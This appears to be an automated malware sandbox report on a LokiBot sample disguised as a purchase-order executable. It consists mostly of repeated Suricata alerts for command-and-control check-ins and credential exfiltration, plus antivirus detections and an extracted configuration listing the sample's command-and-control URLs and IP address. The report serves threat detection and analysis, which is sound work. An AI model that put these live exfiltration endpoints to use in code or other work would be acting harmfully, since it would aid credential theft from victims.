                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:03:31.573054+0200
                        SID:2024318
                        Severity:1
                        Source Port:49735
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:03:52.278473+0200
                        SID:2024313
                        Severity:1
                        Source Port:49744
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:03:52.278473+0200
                        SID:2024318
                        Severity:1
                        Source Port:49744
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:03:31.850643+0200
                        SID:2021641
                        Severity:1
                        Source Port:49736
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-08-29T12:03:31.850643+0200
                        SID:2025381
                        Severity:1
                        Source Port:49736
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:04:30.099350+0200
                        SID:2021641
                        Severity:1
                        Source Port:49760
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-08-29T12:04:30.099350+0200
                        SID:2025381
                        Severity:1
                        Source Port:49760
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:04:09.894995+0200
                        SID:2021641
                        Severity:1
                        Source Port:49752
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-08-29T12:04:09.894995+0200
                        SID:2025381
                        Severity:1
                        Source Port:49752
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:03:34.483482+0200
                        SID:2021641
                        Severity:1
                        Source Port:49737
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-08-29T12:03:34.483482+0200
                        SID:2025381
                        Severity:1
                        Source Port:49737
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:04:37.441389+0200
                        SID:2021641
                        Severity:1
                        Source Port:49763
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-08-29T12:04:37.441389+0200
                        SID:2025381
                        Severity:1
                        Source Port:49763
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:03:57.393911+0200
                        SID:2021641
                        Severity:1
                        Source Port:49747
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-08-29T12:03:57.393911+0200
                        SID:2025381
                        Severity:1
                        Source Port:49747
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:04:04.783249+0200
                        SID:2021641
                        Severity:1
                        Source Port:49750
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-08-29T12:04:04.783249+0200
                        SID:2025381
                        Severity:1
                        Source Port:49750
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:04:42.108847+0200
                        SID:2024313
                        Severity:1
                        Source Port:49764
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:04:42.108847+0200
                        SID:2024318
                        Severity:1
                        Source Port:49764
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:02:56.010523+0200
                        SID:2024312
                        Severity:1
                        Source Port:49714
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-08-29T12:04:02.379636+0200
                        SID:2021641
                        Severity:1
                        Source Port:49749
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-08-29T12:04:02.379636+0200
                        SID:2025381
                        Severity:1
                        Source Port:49749
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:03:42.412382+0200
                        SID:2024313
                        Severity:1
                        Source Port:49740
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:03:42.412382+0200
                        SID:2024318
                        Severity:1
                        Source Port:49740
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:04:19.961465+0200
                        SID:2024313
                        Severity:1
                        Source Port:49755
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:04:19.961465+0200
                        SID:2024318
                        Severity:1
                        Source Port:49755
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:04:34.819178+0200
                        SID:2024313
                        Severity:1
                        Source Port:49761
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:04:34.819178+0200
                        SID:2024318
                        Severity:1
                        Source Port:49761
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:04:44.658105+0200
                        SID:2024313
                        Severity:1
                        Source Port:49765
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:04:44.658105+0200
                        SID:2024318
                        Severity:1
                        Source Port:49765
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:03:34.162896+0200
                        SID:2024313
                        Severity:1
                        Source Port:49736
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:03:34.162896+0200
                        SID:2024318
                        Severity:1
                        Source Port:49736
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:03:39.972478+0200
                        SID:2024313
                        Severity:1
                        Source Port:49738
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:03:39.972478+0200
                        SID:2024318
                        Severity:1
                        Source Port:49738
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:04:39.833421+0200
                        SID:2021641
                        Severity:1
                        Source Port:49764
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-08-29T12:04:39.833421+0200
                        SID:2025381
                        Severity:1
                        Source Port:49764
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:03:14.151085+0200
                        SID:2024313
                        Severity:1
                        Source Port:49728
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:03:14.151085+0200
                        SID:2024318
                        Severity:1
                        Source Port:49728
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:03:21.616215+0200
                        SID:2024313
                        Severity:1
                        Source Port:49731
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:03:21.616215+0200
                        SID:2024318
                        Severity:1
                        Source Port:49731
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:02:51.197441+0200
                        SID:2021641
                        Severity:1
                        Source Port:49713
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-08-29T12:02:51.197441+0200
                        SID:2025381
                        Severity:1
                        Source Port:49713
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:02:53.422002+0200
                        SID:2024312
                        Severity:1
                        Source Port:49713
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-08-29T12:04:27.434952+0200
                        SID:2024313
                        Severity:1
                        Source Port:49758
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:04:27.434952+0200
                        SID:2024318
                        Severity:1
                        Source Port:49758
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:03:26.720005+0200
                        SID:2021641
                        Severity:1
                        Source Port:49734
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-08-29T12:03:26.720005+0200
                        SID:2025381
                        Severity:1
                        Source Port:49734
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:04:22.379291+0200
                        SID:2024313
                        Severity:1
                        Source Port:49756
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:04:22.379291+0200
                        SID:2024318
                        Severity:1
                        Source Port:49756
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:03:37.503478+0200
                        SID:2021641
                        Severity:1
                        Source Port:49738
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-08-29T12:03:37.503478+0200
                        SID:2025381
                        Severity:1
                        Source Port:49738
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:04:34.970294+0200
                        SID:2021641
                        Severity:1
                        Source Port:49762
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-08-29T12:04:34.970294+0200
                        SID:2025381
                        Severity:1
                        Source Port:49762
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:04:25.191402+0200
                        SID:2021641
                        Severity:1
                        Source Port:49758
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-08-29T12:04:25.191402+0200
                        SID:2025381
                        Severity:1
                        Source Port:49758
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:04:04.631989+0200
                        SID:2024313
                        Severity:1
                        Source Port:49749
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:04:04.631989+0200
                        SID:2024318
                        Severity:1
                        Source Port:49749
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:02:58.527194+0200
                        SID:2024313
                        Severity:1
                        Source Port:49715
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:02:58.527194+0200
                        SID:2024318
                        Severity:1
                        Source Port:49715
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:03:00.883637+0200
                        SID:2024313
                        Severity:1
                        Source Port:49716
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:03:00.883637+0200
                        SID:2024318
                        Severity:1
                        Source Port:49716
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:04:07.250483+0200
                        SID:2021641
                        Severity:1
                        Source Port:49751
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-08-29T12:04:07.250483+0200
                        SID:2025381
                        Severity:1
                        Source Port:49751
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:03:03.415827+0200
                        SID:2024313
                        Severity:1
                        Source Port:49723
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:03:03.415827+0200
                        SID:2024318
                        Severity:1
                        Source Port:49723
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:04:17.573612+0200
                        SID:2024313
                        Severity:1
                        Source Port:49754
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:04:17.573612+0200
                        SID:2024318
                        Severity:1
                        Source Port:49754
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:04:22.534398+0200
                        SID:2021641
                        Severity:1
                        Source Port:49757
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-08-29T12:04:22.534398+0200
                        SID:2025381
                        Severity:1
                        Source Port:49757
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:04:27.594258+0200
                        SID:2021641
                        Severity:1
                        Source Port:49759
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-08-29T12:04:27.594258+0200
                        SID:2025381
                        Severity:1
                        Source Port:49759
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:03:50.004455+0200
                        SID:2021641
                        Severity:1
                        Source Port:49744
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-08-29T12:03:50.004455+0200
                        SID:2025381
                        Severity:1
                        Source Port:49744
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:03:47.563972+0200
                        SID:2021641
                        Severity:1
                        Source Port:49743
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-08-29T12:03:47.563972+0200
                        SID:2025381
                        Severity:1
                        Source Port:49743
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:04:32.566846+0200
                        SID:2021641
                        Severity:1
                        Source Port:49761
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-08-29T12:04:32.566846+0200
                        SID:2025381
                        Severity:1
                        Source Port:49761
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:04:49.551951+0200
                        SID:2024313
                        Severity:1
                        Source Port:49767
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:04:49.551951+0200
                        SID:2024318
                        Severity:1
                        Source Port:49767
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:03:37.353714+0200
                        SID:2024313
                        Severity:1
                        Source Port:49737
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:03:37.353714+0200
                        SID:2024318
                        Severity:1
                        Source Port:49737
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:04:47.295065+0200
                        SID:2021641
                        Severity:1
                        Source Port:49767
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-08-29T12:04:47.295065+0200
                        SID:2025381
                        Severity:1
                        Source Port:49767
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:02:58.674545+0200
                        SID:2021641
                        Severity:1
                        Source Port:49716
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-08-29T12:02:58.674545+0200
                        SID:2025381
                        Severity:1
                        Source Port:49716
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:04:02.225701+0200
                        SID:2024313
                        Severity:1
                        Source Port:49748
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:04:02.225701+0200
                        SID:2024318
                        Severity:1
                        Source Port:49748
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:03:47.408084+0200
                        SID:2024313
                        Severity:1
                        Source Port:49742
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:03:47.408084+0200
                        SID:2024318
                        Severity:1
                        Source Port:49742
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:04:47.124603+0200
                        SID:2024313
                        Severity:1
                        Source Port:49766
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:04:47.124603+0200
                        SID:2024318
                        Severity:1
                        Source Port:49766
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:04:12.157744+0200
                        SID:2024313
                        Severity:1
                        Source Port:49752
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:04:12.157744+0200
                        SID:2024318
                        Severity:1
                        Source Port:49752
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:04:12.552431+0200
                        SID:2021641
                        Severity:1
                        Source Port:49753
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-08-29T12:04:12.552431+0200
                        SID:2025381
                        Severity:1
                        Source Port:49753
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:03:19.141350+0200
                        SID:2024313
                        Severity:1
                        Source Port:49730
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:03:19.141350+0200
                        SID:2024318
                        Severity:1
                        Source Port:49730
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:03:52.443390+0200
                        SID:2021641
                        Severity:1
                        Source Port:49745
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-08-29T12:03:52.443390+0200
                        SID:2025381
                        Severity:1
                        Source Port:49745
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:03:42.563782+0200
                        SID:2021641
                        Severity:1
                        Source Port:49741
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-08-29T12:03:42.563782+0200
                        SID:2025381
                        Severity:1
                        Source Port:49741
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:03:40.138811+0200
                        SID:2021641
                        Severity:1
                        Source Port:49740
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-08-29T12:03:40.138811+0200
                        SID:2025381
                        Severity:1
                        Source Port:49740
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:03:21.768470+0200
                        SID:2021641
                        Severity:1
                        Source Port:49732
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-08-29T12:03:21.768470+0200
                        SID:2025381
                        Severity:1
                        Source Port:49732
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:04:42.267991+0200
                        SID:2021641
                        Severity:1
                        Source Port:49765
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-08-29T12:04:42.267991+0200
                        SID:2025381
                        Severity:1
                        Source Port:49765
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:03:59.722184+0200
                        SID:2024313
                        Severity:1
                        Source Port:49747
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:03:59.722184+0200
                        SID:2024318
                        Severity:1
                        Source Port:49747
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:03:44.843250+0200
                        SID:2024313
                        Severity:1
                        Source Port:49741
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:03:44.843250+0200
                        SID:2024318
                        Severity:1
                        Source Port:49741
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:03:49.848265+0200
                        SID:2024313
                        Severity:1
                        Source Port:49743
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:03:49.848265+0200
                        SID:2024318
                        Severity:1
                        Source Port:49743
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:03:45.003825+0200
                        SID:2021641
                        Severity:1
                        Source Port:49742
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-08-29T12:03:45.003825+0200
                        SID:2025381
                        Severity:1
                        Source Port:49742
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:04:15.293513+0200
                        SID:2021641
                        Severity:1
                        Source Port:49754
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-08-29T12:04:15.293513+0200
                        SID:2025381
                        Severity:1
                        Source Port:49754
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:04:09.482496+0200
                        SID:2024313
                        Severity:1
                        Source Port:49751
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:04:09.482496+0200
                        SID:2024318
                        Severity:1
                        Source Port:49751
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Source: http://kbfvzoboss.bid/alien/fre.phpURL Reputation: Label: malware
                        Source: http://alphastand.win/alien/fre.phpURL Reputation: Label: malware
                        Source: http://alphastand.trade/alien/fre.phpURL Reputation: Label: malware
                        Source: http://alphastand.top/alien/fre.phpURL Reputation: Label: malware
                        Source: http://104.248.205.66/index.php/17008709Avira URL Cloud: Label: phishing
                        Source: 00000000.00000002.1745375841.0000000003E30000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://104.248.205.66/index.php/17008709"]}
                        Source: http://104.248.205.66/index.php/17008709Virustotal: Detection: 19%Perma Link
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeReversingLabs: Detection: 52%
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeVirustotal: Detection: 58%Perma Link
                        Source: PO-0Y9005373R664.exeReversingLabs: Detection: 52%
                        Source: PO-0Y9005373R664.exeVirustotal: Detection: 58%Perma Link
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeJoe Sandbox ML: detected
                        Source: PO-0Y9005373R664.exeJoe Sandbox ML: detected
                        Source: PO-0Y9005373R664.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                        Source: PO-0Y9005373R664.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: QUbn.pdb source: PO-0Y9005373R664.exe, VvtddClQv.exe.0.dr
                        Source: Binary string: QUbn.pdbH source: PO-0Y9005373R664.exe, VvtddClQv.exe.0.dr
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbxJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeFile opened: C:\Users\user\AppData\Local\Temp\acrocef_low\NULLJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\AcrobatJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\NULLJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\NULLJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\AdobeJump to behavior

                        Networking

                        barindex
                        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49723 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49723 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49714 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49714 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49748 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49748 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49766 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49766 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.8:49714 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49716 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49716 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49742 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49742 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49723 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49727 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49731 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49727 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49731 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49730 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49730 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49731 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49731 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49723 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49766 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49766 -> 104.248.205.66:80
                        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49748 -> 104.248.205.66:80
